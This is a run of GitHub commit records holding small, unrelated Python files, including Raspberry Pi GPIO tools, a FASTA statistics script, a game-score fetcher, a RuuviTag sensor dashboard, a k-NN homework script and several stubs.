parser=argparse.ArgumentParser(description="Find Best Result From Rolling Experiments");
parser.add_argument("--results-path", type=str, default="../results/",
help="Destination of result files.");
parser.add_argument("--network-type", type=str, default="feedforward",
help="Type of network: feedforward or RNN.");
parser.add_argument("--batch-size", type=str, default="200",
help="Batch size of each mini-batch samples.");
parser.add_argument("--num-epochs", type=str, default="1000",
help="Total training epochs for training.");
args=parser.parse_args();
analysis(**vars(args)); | mit | Python | |
747fa222d1e382ced363ced9d2565f384769316c | add button listener | Shura1oplot/raspberry-pi-collection,Shura1oplot/raspberry-pi-collection | button-listen.py | button-listen.py | #!/usr/bin/env python
import sys
from time import time, sleep
import RPi.GPIO as GPIO
def main(argv=sys.argv):
channel = int(argv[1])
GPIO.setmode(GPIO.BCM)
try:
GPIO.setup(channel, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
ts = 0
while True:
GPIO.wait_for_edge(channel, GPIO.BOTH)
if time() - ts <= 0.2:
continue
sleep(0.01)
print "{}:{}".format(channel, GPIO.input(channel))
sys.stdout.flush()
ts = time()
finally:
GPIO.cleanup()
if __name__ == "__main__":
sys.exit(main())
| mit | Python | |
4576d623fa48242ede9a106b642cc4b020ec3595 | Create processDNAta.py | AEFisher/NGS-scripts | processDNAta.py | processDNAta.py | """
processDNAta.py
version 9/5/2014
Author: Ellen Blaine
This program takes in a folder containing files of exon sequences and returns
data about those files in the form of a CSV file, including which species
for whom a sequence was recovered, the percentage AT/CG bias, and the median
recovered sequence length. This program is meant to be used in conjunction
with TEF and AlignHelper.
Important Note: The input files' sequences should contain question marks to
indicate a sequence was NOT recovered. Questionable nucleotides should be identified
as N's or another character, but NOT question marks. If '?' is found at the
beginning of a sequence, the program will assume that sequence was NOT recovered.
Sample input: python processDNAta_v1.py AlignHelper_Output SpeciesNames.txt
"""
from sys import argv
import os
script, folder, species = argv
path = folder + '/'
listing = os.listdir(path)
newfile = open("processDNAta_Output.csv", 'w')
def createdict(infile):
file_path = path
file = open(file_path, 'r')
dict = {}
seq = ""
name = ""
for line in file:
if line.startswith('>'):
dict[name] = seq
name = line
seq = ""
else:
seq += line
for line in file:
seq += line
dict[name] = seq
return dict
def searchdict(item, dict):
for key in dict.keys():
if item.rstrip() in key and not dict.get(key).startswith('?'):
return True
return False
def findbias(dict):
ATcount = 0
CGcount = 0
ATCGcount = 0
for value in dict.values():
if not value.startswith('?'):
for index in range(0,len(value)):
if value[index] == 'A' or value[index] == 'T':
ATcount += 1
ATCGcount += 1
if value[index] == 'C' or value[index] == 'G':
CGcount += 1
ATCGcount += 1
percentAT = float(ATcount)/ATCGcount * 100
percentCG = float(CGcount)/ATCGcount * 100
return percentAT, percentCG
species_list = []
species_file = open(species, 'r')
newfile.write(" ,")
for line in species_file:
species_list.append(line.rstrip())
newfile.write(line.rstrip() + ", ")
newfile.write("% AT bias, % CG bias, ")
newfile.write("Median Sequence Length (bp)")
newfile.write('\n')
def findmedian(dict):
dict.pop(">" + infile[:infile.find('.')] + "\n")
lengths = []
for value in dict.values():
if not value.startswith('?'):
lengths.append(len(value))
lengths.sort()
middle_index = len(lengths)/2
if len(lengths) % 2 == 1:
return lengths[middle_index]
else:
median = (lengths[middle_index] + lengths[middle_index - 1]) / 2
return median
for infile in listing:
if ".fasta" in infile:
path = folder + '/' + infile
dict = createdict(infile)
file = open(path, 'r')
newfile.write(infile[:infile.find('.')] + ", ")
for item in species_list:
if searchdict(item, dict):
newfile.write("1, ")
else:
newfile.write("0, ")
percentAT, percentCG = findbias(dict)
median = findmedian(dict)
newfile.write(str(percentAT) + "%, " + str(percentCG) + "%, ")
newfile.write(str(median) + "\n")
| mit | Python | |
090cdf443aba871c9230a274fbe2242a7e873822 | Create gpiorpiplugin.py | damianolombardo/fauxmo | gpiorpiplugin.py | gpiorpiplugin.py | """
GPIORPiPlugin.py :: Fauxmo plugin for simple RPi.GPIO.
"""
try:
import RPi.GPIO as GPIO
except ImportError:
import testRPiGPIO as GPIO
print('Using testRPiGPIO')
from functools import partialmethod # type: ignore # not yet in typeshed
from fauxmo.plugins import FauxmoPlugin
from time import sleep
import sys
DEBUG = True
def dbg(msg):
global DEBUG
if DEBUG:
print(msg)
sys.stdout.flush()
def gpio_handler(pins, state=None):
if type(pins) is not list:
pins = [pins]
if state == 'input':
for p in pins:
GPIO.input(p, state)
else:
for p in pins:
GPIO.output(p, state)
class GPIORPiPlugin(FauxmoPlugin):
"""Fauxmo Plugin for running commands on the local machine."""
def __init__(self, *, name: str, port: int, on_cmd: int, off_cmd: int, pin: int or list, mode: str,
switching_type: str) -> None:
"""Initialize a GPIORPiPlugin instance.
Args:
name: Name for this Fauxmo device
port: Port on which to run a specific GPIORPiPlugin instance
on_cmd: Command to be called when turning device on
off_cmd: Command to be called when turning device off
pin: GPIO pin number
mode: GPIO mode eg BCM, BOARD
switching_type: What kind of output to send, oneshot, toggle
"""
self.on_cmd = on_cmd
self.off_cmd = off_cmd
self.pin = pin
self.mode = mode
self.switching_type = switching_type
if mode == 'BCM':
GPIO.setmode(GPIO.BCM)
GPIO.setup(self.pin, GPIO.OUT)
self.internal_state = GPIO.input(self.pin)
elif mode == 'BOARD':
GPIO.setmode(GPIO.BOARD)
GPIO.setup(self.pin, GPIO.OUT)
self.internal_state = GPIO.input(self.pin)
elif mode == 'LEECH':
if type(self.pin) is list:
for p in self.pin:
if GPIO.gpio_function(p) != GPIO.OUT:
raise Exception('Pin %i has not been defined as standalone switch' % p)
elif type(self.pin) is int:
dbg('Leech Mode Set for pin %i' % self.pin)
if self.switching_type == 'oneshot':
self.func = self.oneshot
else:
self.func = self.toggle
super().__init__(name=name, port=port)
def oneshot(self, cmd: str) -> bool:
"""Partialmethod to run command.
Args:
cmd: Will be one of `"on_cmd"` or `"off_cmd"`, which `getattr` will
use to get the instance attribute.
"""
state = getattr(self, cmd)
gpio_handler(self.pin, state)
sleep(2)
gpio_handler(self.pin, 1 - state)
self.internal_state = state
return True
def toggle(self, cmd: str) -> bool:
"""Partialmethod to run command.
Args:
cmd: Will be one of `"on_cmd"` or `"off_cmd"`, which `getattr` will
use to get the instance attribute.
"""
state = getattr(self, cmd)
gpio_handler(self.pin, state)
self.internal_state = GPIO.input(self.pin)
return True
def run_cmd(self, cmd: str):
return self.func(cmd)
on = partialmethod(run_cmd, "on_cmd")
off = partialmethod(run_cmd, "off_cmd")
if __name__ == "__main__":
print('Create switch')
test1 = GPIORPiPlugin(name="test switch", port=12345, on_cmd=1, off_cmd=0, pin=14, mode='BCM',
switching_type='toggle')
test2 = GPIORPiPlugin(name="test switch", port=12345, on_cmd=1, off_cmd=0, pin=15, mode='BCM',
switching_type='toggle')
test3 = GPIORPiPlugin(name="test switch", port=12345, on_cmd=1, off_cmd=0, pin=18, mode='BCM',
switching_type='toggle')
test4 = GPIORPiPlugin(name="test switch", port=12345, on_cmd=1, off_cmd=0, pin=[14, 15, 18], mode='LEECH',
switching_type='toggle')
print('test on')
test1.on()
print('test off')
test1.off()
test4.on()
| mit | Python | |
8dc7f657e816ab9becbabcf032e62d088f2b6b3c | Add network visualization tool | step-up-health/step-up-backend,step-up-health/step-up-backend | viz.py | viz.py | import os
import json
import hashlib
def get_data_path():
if not 'OPENSHIFT_DATA_DIR' in os.environ:
return '../data/data.json'
else:
return os.path.join(os.environ['OPENSHIFT_DATA_DIR'], 'data.json')
def get_data():
if not os.path.isfile(get_data_path()):
with open(get_data_path(), 'w') as fh:
fh.write("{}")
data = json.load(open(get_data_path(), 'r'))
return data
def weird_hash(data):
hashed = hashlib.md5()
hashed.update(data)
digest = hashed.hexdigest()
uppercase_offset = ord('A') - ord('0')
for x in range(ord('0'), ord('9')):
digest = digest.replace(chr(x), chr(x + uppercase_offset))
return digest
out = 'graph main {\n'
dot_usernames = ''
dot_relations = ''
data = get_data()
for k in data:
user = data[k]
username = user['username']
dot_usernames += weird_hash(k) + '[label="' + weird_hash(k)[:5] + '"]' + '\n'
if not 'friends' in user:
continue
for friend in user['friends']:
if not (weird_hash(friend) + '--' +
weird_hash(k) + '\n') in dot_relations:
dot_relations += weird_hash(k) + '--' + \
weird_hash(friend) + '\n'
out += dot_usernames
out += dot_relations
out += '}'
print(out)
| cc0-1.0 | Python | |
0f3815ed22c4e25d311f36e0d9be9c5b38bd32bd | Create the basic structure for the topic handler. | yiyangyi/cc98-tornado | handler/topic.py | handler/topic.py | class IndexHandler(BaseHandler):
class ViewHandler(BaseHandler):
class CreateHandler(BaseHandler):
class EditHandler(BaseHandler):
class FavoriteHandler(BaseHandler):
class CancelFavoriteHandler(BaseHandler):
class VoteHandler(BaseHandler):
class ReplyEditHandler(BaseHandler): | mit | Python | |
c725fb59055810903fd4a9b1da1b6ef11cab2d74 | Add functions for timeseries reduction in mpopf | openego/eDisGo,openego/eDisGo | edisgo/opf/timeseries_reduction.py | edisgo/opf/timeseries_reduction.py | import logging
import pandas as pd
from edisgo.flex_opt import check_tech_constraints
logger = logging.getLogger(__name__)
def _scored_critical_current(edisgo_obj, grid):
# Get allowed current per line per time step
i_lines_allowed = check_tech_constraints.lines_allowed_load(
edisgo_obj, grid, 'mv')
i_lines_pfa = edisgo_obj.results.i_res[grid.lines_df.index]
# Get current relative to allowed current
relative_i_res = i_lines_pfa / i_lines_allowed
# Get lines that have violations
crit_lines_score = relative_i_res[relative_i_res > 1]
# Remove time steps with no violations
crit_lines_score = crit_lines_score.dropna(how='all', axis=0)
# Cumulate violations over all lines per time step
crit_lines_score = crit_lines_score.sum(axis=1)
return crit_lines_score.sort_values(ascending=False)
def _scored_critical_voltage(edisgo_obj, grid):
nodes = grid.buses_df
# Get allowed deviations per time step
v_dev_allowed_upper, v_dev_allowed_lower = check_tech_constraints.mv_allowed_deviations(
edisgo_obj, voltage_levels='mv')
voltage_diff_uv, voltage_diff_ov = check_tech_constraints.voltage_diff(
edisgo_obj, nodes, v_dev_allowed_upper, v_dev_allowed_lower, voltage_level='mv')
# Get score for nodes that are over or under the allowed deviations
voltage_diff_uv = voltage_diff_uv[voltage_diff_uv > 0].dropna(
axis=1, how='all').sum(axis=0)
voltage_diff_ov = voltage_diff_ov[voltage_diff_ov > 0].dropna(
axis=1, how='all').sum(axis=0)
return (voltage_diff_ov + voltage_diff_uv).sort_values(ascending=False)
def get_steps_curtailment(edisgo_obj, percentage=0.5):
'''
:param edisgo_obj: The eDisGo API object
:type name: :class:`~.network.network.EDisGo`
:param percentage: The percentage of most critical time steps to select
:type percentage: float
:returns: list of `pandas.Timestamp<timestamp>` -- the reduced time steps for modeling curtailment
'''
# Run power flow if not available
if edisgo_obj.results is None:
logger.debug('Running initial power flow')
edisgo_obj.analyze(mode='mv')
grid = edisgo_obj.topology.mv_grid
# Select most critical steps based on current viaolations
current_scores = scored_critical_current(edisgo_obj, grid)
num_steps_current = int(len(current_scores) * percentage)
steps = current_scores[:num_steps_current].index.tolist()
# Select most critical steps based on voltage viaolations
voltage_scores = scored_critical_voltage(edisgo_obj, grid)
num_steps_voltage = int(len(voltage_scores) * percentage)
steps.extend(voltage_scores[:num_steps_voltage].index.tolist())
return steps
def get_steps_storage(edisgo_obj, window=5):
'''
:param edisgo_obj: The eDisGo API object
:type name: :class:`~.network.network.EDisGo`
:param window: The additional hours to include before and after each critical time step
:type window: int
:returns: list of `pandas.Timestamp<timestamp>` -- the reduced time steps for modeling storage
'''
# Run power flow if not available
if edisgo_obj.results is None:
logger.debug('Running initial power flow')
edisgo_obj.analyze(mode='mv')
crit_periods = []
# Get periods with voltage violations
crit_nodes = check_tech_constraints.mv_voltage_deviation(
edisgo_obj, voltage_levels='mv')
for v in crit_nodes.values():
nodes = pd.DataFrame(v)
if 'time_index' in nodes:
for step in nodes['time_index']:
if not step in crit_periods:
crit_periods.append(step)
# Get periods with current violations
crit_lines = check_tech_constraints.mv_line_load(edisgo_obj)
if 'time_index' in crit_lines:
for step in crit_lines['time_index']:
if not step in crit_periods:
crit_periods.append(step)
reduced = []
window_period = pd.Timedelta(window, unit='h')
for step in crit_periods:
reduced.extend(
pd.date_range(
start=step -
window_period,
end=step +
window_period,
freq='h'))
# strip duplicates
reduced = list(dict.fromkeys(reduced))
logger.debug(reduced)
return reduced
| agpl-3.0 | Python | |
b48a17f45bbb9a2202c8c3fcb377037b92961f0b | Create na.py | pax2001/test | na.py | na.py | hjghjgj
| apache-2.0 | Python | |
48a9b87dd86d600cdab4224c84aa5ce0685b775c | Add fetch data file | joostsijm/Supremacy1914,joostsijm/Supremacy1914 | python/fetch.py | python/fetch.py | #!/usr/bin/env python
import time
import json
import requests
headers = {
"Host": "xgs15.c.bytro.com",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0",
"Accept": "text/plain, */*; q=0.01",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Content-Length": "387",
"Origin": "https://www.supremacy1914.com",
"DNT": "1",
"Connection": "keep-alive",
}
payloadSample = {
"@c": "ultshared.action.UltUpdateGameStateAction",
"gameID": "2117045",
"playerID": 0,
"userAuth": "787925a25d0c072c3eaff5c1eff52829475fd506",
"tstamp": int(time.time())
}
url = 'https://xgs15.c.bytro.com/'
def print_json(jsonText):
print(json.dumps(jsonText, sort_keys=True, indent=4))
def get_day():
payload = payloadSample
payload["stateType"] = 12
payload["option"] = 30
r = requests.post(url, headers=headers, json=payload)
response = json.loads(r.text)
result = response["result"]
return result["dayOfGame"]
def get_score(day):
payload = payloadSample
payload["stateType"] = 2
payload["option"] = day
r = requests.post(url, headers=headers, json=payload)
text = json.loads(r.text)
return text["result"]["ranking"]["ranking"]
def write_results():
resultsFile = open("results.csv","w")
for day in range(0, get_day()):
day += 1;
print("day: " + str(day))
result = get_score(day)
result.pop(0)
formatedResult = str();
for player in result:
formatedResult += str(player) + ","
resultsFile.write(formatedResult + "\n");
resultsFile.close()
def get_players():
payload = payloadSample
payload["stateType"] = 1
r = requests.post(url, headers=headers, json=payload)
text = json.loads(r.text)
print_json(text["result"]["players"])
get_players()
#write_results()
print("\ndone!")
| apache-2.0 | Python | |
3c7e8f08699fa6d2b004f86e6bdb0bc4792ae8c2 | Create regex.py | rogergrindelwald/code_snippets | python/regex.py | python/regex.py | # re.IGNORECASE can be used for allowing user to type arbitrary cased texts.
QUIT_NO_CASE = re.compile('quit', re.IGNORECASE)
| mit | Python | |
b01c602f156b5a72db1ea4f27989aa5b1afdada8 | ADD Cleaning before each test | telefonicaid/fiware-keypass,telefonicaid/fiware-keypass,telefonicaid/fiware-keypass | src/behavior/features/terrain.py | src/behavior/features/terrain.py | from lettuce import *
import requests
TARGET_URL='http://localhost:8080'
tenantList = [ "511", "615", "634", "515" ]
@before.each_scenario
def cleanContext(feature):
for tenant in tenantList:
url = TARGET_URL + '/pap/v1/' + tenant
r = requests.delete(url)
| apache-2.0 | Python | |
5f4263b6968c839bd67a60f4a2ffd89f8b373193 | Update __init__.py | Tendrl/node-agent,Tendrl/node_agent,r0h4n/node-agent,Tendrl/node_agent,Tendrl/node-agent,r0h4n/node-agent,r0h4n/node-agent,Tendrl/node-agent | tendrl/provisioning/objects/definition/__init__.py | tendrl/provisioning/objects/definition/__init__.py | import pkg_resources
from ruamel import yaml
from tendrl.commons import objects
class Definition(objects.BaseObject):
internal = True
def __init__(self, *args, **kwargs):
self._defs = True
super(Definition, self).__init__(*args, **kwargs)
self.data = pkg_resources.resource_string(__name__,
"provisioning.yaml")
self._parsed_defs = yaml.safe_load(self.data)
self.value = '_NS/provisioning/definitions'
def get_parsed_defs(self):
if self._parsed_defs:
return self._parsed_defs
self._parsed_defs = yaml.safe_load(self.data)
return self._parsed_defs
| import pkg_resources
from ruamel import yaml
from tendrl.commons import objects
class Definition(objects.BaseObject):
internal = True
def __init__(self, *args, **kwargs):
self._defs = True
super(Definition, self).__init__(*args, **kwargs)
self.data = pkg_resources.resource_string(__name__,
"provisioning.yaml")
self._parsed_defs = yaml.safe_load(self.data)
self.value = '_NS/provisioning/definitions'
def get_parsed_defs(self):
self._parsed_defs = yaml.safe_load(self.data)
return self._parsed_defs
| lgpl-2.1 | Python |
f784228170557643bc5cb1efc61ea38b45796210 | Add flask application | ledmonster/nishiki | app.py | app.py | # -*- coding: utf-8 -*-
from flask import Flask
app = Flask(__name__)
@app.route('/')
def main():
return 'hello'
if __name__ == "__main__":
app.run()
| mit | Python | |
ef67bf3d8a418399fca676502a87ccb7d3914ed1 | Add module with common potentials, with force versions for some | eddiejessup/ciabatta | Lib/potentials.py | Lib/potentials.py | import numpy as np
import utils
def LJ(r_0, U_0):
'''
Lennard-Jones with minimum at (r_0, -U_0).
'''
r_0_6 = r_0 ** 6
def func(r_sq):
six_term = r_0_6 / r_sq ** 3
return U_0 * (six_term ** 2 - 2.0 * six_term)
return func
def step(r_0, U_0):
'''
Potential Well at r with U(r < r_0) = 0, U(r > r_0) = U_0.
'''
def func(r_sq):
return np.where(r_sq < r_0 ** 2, U_0, 0.0)
return func
def inv_sq(k):
'''
Inverse-square law, U(r) = -k / r.
'''
def func(r_sq):
return -k / np.sqrt(r_sq)
return func
def harm_osc(k):
'''
Harmonic oscillator, U(r) = k * (r ** 2) / 2.0.
'''
def func(r_sq):
return 0.5 * k * r_sq ** 2
return func
def harm_osc_F(k):
'''
Harmonic oscillator, F(r) = -k * r.
'''
def func(r):
return -k * r
return func
def logistic(r_0, U_0, k):
''' Logistic approximation to step function. '''
def func(r_sq):
return 0.5 * U_0 * (1.0 + np.tanh(k * (np.sqrt(r_sq) - r_0)))
return func
def logistic_F(r_0, U_0, k):
def func(r):
r_sq = utils.vector_mag(r)
return -U_0 * utils.vector_unit_nonull(r) * (1.0 - np.square(np.tanh(k * (np.sqrt(r_sq) - r_0))))[:, np.newaxis]
return func
def anis_wrap(func_iso):
'''
Wrap an isotropic potential in an anisotropic envelope
'''
def func_anis(r_sq, theta):
return func_iso(r_sq) * (0.5 + np.cos(0.5*theta) ** 2)
return func_anis
| bsd-3-clause | Python | |
1ece8c8640214d69a224f94f1b1ac93ec53d7699 | Add image processing system (dummy) | susemeee/Chunsabot-framework | chunsabot/modules/images.py | chunsabot/modules/images.py | from chunsabot.botlogic import brain
@brain.route("@image")
def add_image_description(msg, extras):
attachment = extras['attachment']
if not attachment:
return None
return "asdf"
| mit | Python | |
84be951a9160e9998f3ed702542cee7274081091 | Create __init__.py | parrisha/raspi-visualizer | spectrum/__init__.py | spectrum/__init__.py | mit | Python | ||
92fde42097c4e0abbf5a7835a72f58f52c9b8499 | Create example.py | Peter9192/MAQ_PhD,Peter9192/MAQ_PhD | Python/example.py | Python/example.py | #This is an example script.
| mit | Python | |
3a56b89aacad2f948bf85b78c0834edf7c8d8d01 | Add missing file. | jonathanj/renamer,jonathanj/renamer | renamer/util.py | renamer/util.py | import re
class ConditionalReplacer(object):
def __init__(self, cond, regex, repl):
super(ConditionalReplacer, self).__init__()
self.cond = re.compile(cond)
self.regex = re.compile(regex)
self.repl = repl
@classmethod
def fromString(cls, s):
return cls(*s.strip().split('\t'))
def replace(self, input, predInput):
if self.cond.search(predInput) is None:
return input
return self.regex.sub(self.repl, input, int(not self.globalReplace))
class Replacer(ConditionalReplacer):
def __init__(self, regex, replace):
super(Replacer, self).__init__(r'.*', regex, replace)
def replace(self, input, predInput):
return super(Replacer, self).replace(input, input)
class Replacement(object):
def __init__(self, replacers):
super(Replacement, self).__init__()
self.replacers = replacers
@classmethod
def fromFile(cls, fd, replacerType=Replacer):
replacers = []
if fd is not None:
replacers = [replacerType.fromString(line) for line in fd]
return cls(replacers)
def add(self, replacer):
self.replacers.append(replacer)
def replace(self, input, predInput=None):
if predInput is None:
predInput = input
for r in self.replacers:
input = r.replace(input, predInput)
return input
| mit | Python | |
066673aea6887d9272646d8bac8f99c69387e61d | add management command to check the status of a bounced email | dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq | corehq/util/management/commands/check_bounced_email.py | corehq/util/management/commands/check_bounced_email.py | from django.core.management.base import BaseCommand
from corehq.util.models import (
BouncedEmail,
PermanentBounceMeta,
ComplaintBounceMeta,
)
class Command(BaseCommand):
help = "Check on the bounced status of an email"
def add_arguments(self, parser):
parser.add_argument('bounced_email')
parser.add_argument(
'--show-details',
action='store_true',
default=False,
help='Show extra details of bounced messages',
)
def handle(self, bounced_email, **options):
is_bounced = BouncedEmail.objects.filter(email=bounced_email).exists()
show_details = options['show_details']
if not is_bounced:
self.stdout.write(f'\n{bounced_email} is NOT bouncing. '
f'All clear!\n\n')
return
self.stdout.write('\n\n')
self.stdout.write('*' * 200)
self.stdout.write(f'! YES, {bounced_email} is marked as bounced\n')
self.stdout.write('*' * 200)
self.stdout.write('\n')
permanent_bounces = PermanentBounceMeta.objects.filter(
bounced_email__email=bounced_email).all()
if permanent_bounces:
self.stdout.write('The following Permanent Bounce '
'records were found:')
self.stdout.write('\nSub-Type\tSNS Timestamp'
'\t\t\tCreated on HQ\t\t\tReason')
self.stdout.write('.' * 200)
for record in permanent_bounces:
self.stdout.write(f'{record.sub_type}'
f'\t\t{record.timestamp}'
f'\t{record.created}'
f'\t{record.reason}')
if show_details:
for key, val in record.headers:
self.stdout.write(f'\t\t{key}:\t{val}')
self.stdout.write(f'\t\tdestination:\t{record.destination}')
self.stdout.write('\n\n')
complaints = ComplaintBounceMeta.objects.filter(
bounced_email__email=bounced_email).all()
if complaints:
self.stdout.write('The following Complaint '
'records were found:')
self.stdout.write('\nSNS Timestamp'
'\t\t\tCreated on HQ'
'\t\t\tFeedback Type'
'\t\tSub-Type'
'\tDestination')
self.stdout.write('.' * 200)
for record in complaints:
self.stdout.write(f'{record.timestamp}'
f'\t{record.created}'
f'\t{record.feedback_type}'
f'\t{record.sub_type}'
f'\t{record.destination}')
if show_details:
for key, val in record.headers:
self.stdout.write(f'\t\t{key}:\t{val}')
self.stdout.write('\n\n')
| bsd-3-clause | Python | |
fea6011cf14e87492d511db3ed9415f5938929bf | add ex8 | AisakaTiger/Learn-Python-The-Hard-Way,AisakaTiger/Learn-Python-The-Hard-Way | ex8.py | ex8.py | formatter = "%r %r %r %r"
print formatter %(1, 2, 3, 4)
print formatter % ("one", "two", "three", "four")
print formatter %(True, False, False, True)
print formatter %(formatter, formatter, formatter,formatter)
print formatter % (
"I had this thing.",
"That you could type up right",
"But it did't sing.",
"So I said goodnight."
)
| mit | Python | |
2ea014495f559072c5ecfac0b1117979793cf042 | Create ruuvitag-web.py | dimamedia/RuuviTag-logger,dimamedia/RuuviTag-logger | ruuvitag-web.py | ruuvitag-web.py | #!/usr/bin/python3
from flask import Flask, render_template
from datetime import datetime, timedelta
import sqlite3
import json
import random
app = Flask(__name__)
def randomRGB():
r, g, b = [random.randint(0,255) for i in range(3)]
return r, g, b, 1
@app.route('/')
def index():
conn = sqlite3.connect("ruuvitag.db")
conn.row_factory = sqlite3.Row
# set hom many days you want to see in charts
N = 30 # show charts for 30 days
date_N_days_ago = str(datetime.now() - timedelta(days=N))
tags = conn.execute("SELECT DISTINCT mac, name FROM sensors WHERE timestamp > '"+date_N_days_ago+"' ORDER BY name, timestamp DESC")
sensors = ['temperature', 'humidity', 'pressure']
sList = {}
datasets = {}
for sensor in sensors:
datasets[sensor] = []
for tag in tags:
if tag['name']:
sList['timestamp'] = []
for sensor in sensors:
sList[sensor] = []
sData = conn.execute("SELECT timestamp, temperature, humidity, pressure FROM sensors WHERE mac = '"+tag['mac']+"' AND timestamp > '"+date_N_days_ago+"' ORDER BY timestamp")
for sRow in sData:
sList['timestamp'].append(str(sRow['timestamp'])[:-3]) # remove seconds from timestamp
for sensor in sensors:
sList[sensor].append(sRow[sensor])
color = randomRGB()
dataset = """{{
label: '{}',
borderColor: 'rgba{}',
fill: false,
lineTension: 0.2,
data: {}
}}"""
for sensor in sensors:
datasets[sensor].append(dataset.format(tag['name'], color, sList[sensor]))
conn.close()
return render_template('ruuvitag.html', time = sList['timestamp'], temperature = datasets['temperature'], humidity = datasets['humidity'], pressure = datasets['pressure'])
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=int('80'))
| mit | Python | |
2becf3b5223da8dc8d312462ae84f32ec3aff129 | Create hw1.py | yl9jv/assignment_1 | hw1.py | hw1.py | # Name: Yicheng Liang
# Computing ID: yl9jv
import math
k = raw_input("Please enter the value for k: ")
while (not k.isdigit()):
k = raw_input("Please enter a number for k: ")
k = int(k)
m = raw_input("Please enter the value for M: ")
while (not m.isdigit()):
m = raw_input("Please enter a number for M: ")
m = int(m)
items = []
filename = raw_input("Please enter the file name: ")
f = open(filename, 'r')
while (m > 0):
line = f.readline()
if line == "":
break
else:
m -= 1
temp = line.split()
items.append((temp[0], float(temp[1]), float(temp[2])))
new_item = raw_input("Please enter the values for x and y: ")
temp = new_item.split()
x = float(temp[0])
y = float(temp[1])
while (x != 1.0 and y != 1.0):
neighbors = []
for item in items:
distance = math.sqrt(math.pow((x - item[1]), 2) + math.pow((y - item[2]), 2))
neighbors.append((item[0], item[1], item[2], distance))
neighbors = sorted(neighbors, key=lambda a:a[3])
counter = 0
cat1 = ""
cat2 = ""
num_cat1 = 0
num_cat2 = 0
cat1_distance = 0
cat2_distance = 0
print "(1) nearest neighbors: "
k_NN = []
while counter != k:
print neighbors[counter]
if cat1 == "":
cat1 = neighbors[counter][0]
num_cat1 += 1
cat1_distance += neighbors[counter][3]
elif (cat1 != neighbors[counter][0] and cat2 == ""):
cat2 = neighbors[counter][0]
num_cat2 += 1
cat2_distance += neighbors[counter][3]
elif cat1 == neighbors[counter][0]:
num_cat1 += 1
cat1_distance += neighbors[counter][3]
elif cat2 == neighbors[counter][0]:
num_cat2 += 1
cat2_distance += neighbors[counter][3]
counter += 1
k_NN.append(neighbors[counter])
print ''
if num_cat1 < num_cat2:
print "(2)point classified as: " + cat2
else:
print "(2)point classified as: " + cat1
print ''
print "(3) average distance from " + cat1 + " is: " + str(cat1_distance / num_cat1)
print " average distance from " + cat2 + " is: " + str(cat2_distance / num_cat2)
print ""
print ""
new_item = raw_input("Please enter the values for x and y: ")
temp = new_item.split()
x = float(temp[0])
y = float(temp[1])
| mit | Python | |
6274ee8d776c829998dfaa56cb419d1263242a48 | Add topological sorting in Python | salman-bhai/DS-Algo-Handbook,salman-bhai/DS-Algo-Handbook,salman-bhai/DS-Algo-Handbook,salman-bhai/DS-Algo-Handbook | Algorithms/Sort_Algorithms/Topological_Sort/TopologicalSort.py | Algorithms/Sort_Algorithms/Topological_Sort/TopologicalSort.py | '''
Topological sort.
Taken from :
http://stackoverflow.com/questions/15038876/topological-sort-python
'''
from collections import defaultdict
from itertools import takewhile, count
def sort_topologically(graph):
levels_by_name = {}
names_by_level = defaultdict(set)
def walk_depth_first(name):
if name in levels_by_name:
return levels_by_name[name]
children = graph.get(name, None)
level = 0 if not children else (1 + max(walk_depth_first(lname) for lname in children))
levels_by_name[name] = level
names_by_level[level].add(name)
return level
for name in graph:
walk_depth_first(name)
return list(takewhile(lambda x: x is not None, (names_by_level.get(i, None) for i in count())))
graph = {
1: [2, 3],
2: [4, 5, 6],
3: [4,6],
4: [5,6],
5: [6],
6: []
}
print(sort_topologically(graph)) | mit | Python | |
df52febb14761d741a20dcdc1cbfd5ea8cd7e07b | add my bing script as an example | aliclark/irctail,aliclark/irctail | bingaling.aclark.py | bingaling.aclark.py | #!/usr/bin/python
import re
import baseformat
import bingaling
bingcheck_restr = r'([a4][c][l1][a4][r][k])|([a4][l1][i1])'
bingcheck_full = re.compile(r'(('+'\x04\x65'+r')|('+'\x04\x63'r')|([^\w\-'+'\x04'+r'])|(^)|(\t))(' + bingcheck_restr + r')(([^\w\-])|($))', re.IGNORECASE)
def bingcheck(line):
r = baseformat.splitter.match(line)
if r:
sub = r.group(3) + '\t' + r.group(4) + '\t' + re.sub(bingcheck_full, '\\1\x16\\7\x16\\11', r.group(5));
if r.group(1):
sub = r.group(1) + sub
else:
sub = re.sub(bingcheck_full, '\x16\\7\x16', line);
if sub != line:
bingaling.sendmail(line)
return sub
def main():
bingaling.bingpipe(bingcheck)
if __name__ == '__main__':
main()
| isc | Python | |
d95732ce90c5c9ac571ffc78b45eaa4424a11038 | Create nested_scrape.py | wolfdale/Scraper | nested_scrape.py | nested_scrape.py | """ PROJECT SCRAPER """
from bs4 import BeautifulSoup
import urllib2
def scraper(url, outer_tag, outer_attr, outer_attr_name, inner_tag, inner_attr, inner_attr_name):
''' BEAUTIFUL SOUP INIT '''
web=urllib2.urlopen(url)
soup=BeautifulSoup(web,'html.parser',from_encoding='utf-8')
''' ***** CONTENT LIST ***** '''
content=[]
for outer_ in soup.find_all(outer_tag,{outer_attr : outer_attr_name}):
for inner_ in outer_.find_all( inner_tag,{inner_attr : inner_attr_name}):
content.append(inner_.text.encode('utf-8'))
print content
def decode_prams():
pass
if __name__=='__main__':
print 'url'
url=raw_input()
print 'outer tag name'
outer_tag=raw_input()
print ' outer attr'
outer_attr=raw_input()
print 'outer attr name'
outer_attr_name=raw_input()
print 'inner tag'
inner_tag=raw_input()
print 'inner attr'
inner_attr=raw_input()
print 'inner attr name'
inner_attr_name=raw_input()
scraper(url, outer_tag, outer_attr, outer_attr_name, inner_tag, inner_attr, inner_attr_name)
| mit | Python | |
d2ed4e7a0d8edafa250044e8b9ecf319c14b85e0 | add pkc.py | concise/ecclab | pkc.py | pkc.py | class PkcError(BaseException):
pass
class PkcTypeError(TypeError, PkcError):
pass
class PkcCertificateError(ValueError, PkcError):
pass
class PkcPublickeyError(ValueError, PkcError):
pass
def pkc_extract_publickey_from_certificate(certificate):
if type(certificate) is bytes:
return _pkc_extract_publickey_from_certificate(certificate)
else:
